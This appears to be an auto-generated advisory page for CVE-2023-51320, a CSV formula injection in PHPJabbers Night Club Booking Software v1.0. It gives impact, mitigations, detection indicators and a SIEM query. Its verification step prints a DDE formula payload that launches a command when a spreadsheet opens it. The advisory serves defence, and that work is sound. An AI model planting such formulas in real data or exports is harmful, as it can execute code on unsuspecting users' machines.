CVE-2023-51320
📋 TL;DR
PHPJabbers Night Club Booking Software v1.0 has a CSV injection vulnerability in the Languages section Labels parameters field that allows attackers to inject malicious formulas into CSV files. When users open these CSV files in spreadsheet applications like Excel, the formulas can execute commands, potentially leading to remote code execution. This affects all installations of PHPJabbers Night Club Booking Software v1.0.
💻 Affected Systems
- PHPJabbers Night Club Booking Software
📦 What is this software?
⚠️ Risk & Real-World Impact
Worst Case
Remote code execution on client systems when users open malicious CSV files in vulnerable spreadsheet applications, potentially leading to full system compromise.
Likely Case
Data exfiltration, client-side code execution, or denial of service through malicious CSV formulas when users open exported files.
If Mitigated
Limited impact if CSV files are opened in applications that don't execute formulas or if proper input validation is implemented.
🎯 Exploit Status
Exploitation requires authenticated access to the vulnerable interface and user interaction to open malicious CSV files.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: Unknown
Vendor Advisory: None found
Restart Required: No
Instructions:
No official patch available. Implement input validation and sanitization for CSV export functionality.
🔧 Temporary Workarounds
Input Validation for CSV Export
allImplement server-side validation to sanitize user input in Languages section Labels parameters before CSV export.
Implement PHP input sanitization: htmlspecialchars($input, ENT_QUOTES, 'UTF-8')
Validate input against allowed character patterns
CSV Output Sanitization
allPrepend single quotes to all CSV fields to prevent formula execution in spreadsheet applications.
Modify CSV generation: $sanitized_value = "'" . $value;
Apply to all user-controlled fields in CSV exports
🧯 If You Can't Patch
- Restrict access to System Options > Languages section to trusted administrators only
- Educate users to never open CSV files from untrusted sources in spreadsheet applications that execute formulas
🔍 How to Verify
Check if Vulnerable:
Test by entering formula payloads like =cmd|' /C calc'!A0 in Languages section Labels parameters and exporting CSVCheck Version:
Check software version in admin panel or readme filesVerify Fix Applied:
Verify that formula payloads in CSV exports are properly sanitized or prefixed with single quotes📡 Detection & Monitoring
Log Indicators:
- Unusual CSV export requests
- Multiple failed CSV generation attempts
- Admin panel access from unusual IPs
Network Indicators:
- CSV file downloads containing formula patterns
- Unusual traffic to CSV export endpoints
SIEM Query:
source="web_server" AND (uri="/admin/export_csv" OR uri="/admin/languages") AND (status=200 OR status=500)